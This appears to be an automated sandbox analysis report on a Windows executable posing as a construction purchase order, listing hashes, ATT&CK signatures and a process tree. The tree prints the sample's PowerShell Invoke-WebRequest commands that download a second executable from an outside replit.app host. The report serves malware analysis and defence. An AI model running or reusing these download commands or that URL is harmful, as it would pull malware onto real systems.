Analysis
-
max time kernel
14s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
29-07-2024 07:35
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
jdconstructnOrderfdp..exe
Resource
win10v2004-20240709-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2776 powershell.exe 1056 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1056 powershell.exe 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 448 wrote to memory of 1884 448 jdconstructnOrderfdp..exe cmd.exe PID 448 wrote to memory of 1884 448 jdconstructnOrderfdp..exe cmd.exe PID 448 wrote to memory of 1884 448 jdconstructnOrderfdp..exe cmd.exe PID 448 wrote to memory of 1884 448 jdconstructnOrderfdp..exe cmd.exe PID 1884 wrote to memory of 1056 1884 cmd.exe powershell.exe PID 1884 wrote to memory of 1056 1884 cmd.exe powershell.exe PID 1884 wrote to memory of 1056 1884 cmd.exe powershell.exe PID 1884 wrote to memory of 2776 1884 cmd.exe powershell.exe PID 1884 wrote to memory of 2776 1884 cmd.exe powershell.exe PID 1884 wrote to memory of 2776 1884 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FD33.tmp\FD34.tmp\FD35.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TLHZCW1YK4EQO8YFTMQ0.temp
Filesize7KB
MD56e841bff0316c7155ddb5f1831b5c7d1
SHA164fbf22b57116c43cb8bd09a2ec6de8008ba91e4
SHA25656b0abbab4702baf6a30d4925ad33520040dc402e218dfcccbd4324eb41efa9a
SHA51241511444e34559bfda88f4c6f321d0b3ff26c829571c263c6430dfe0f3f9c3ff2089c026c9f9751203e207a9a41a23c6cb19c08c2e49aa870d4d0ccb8519b538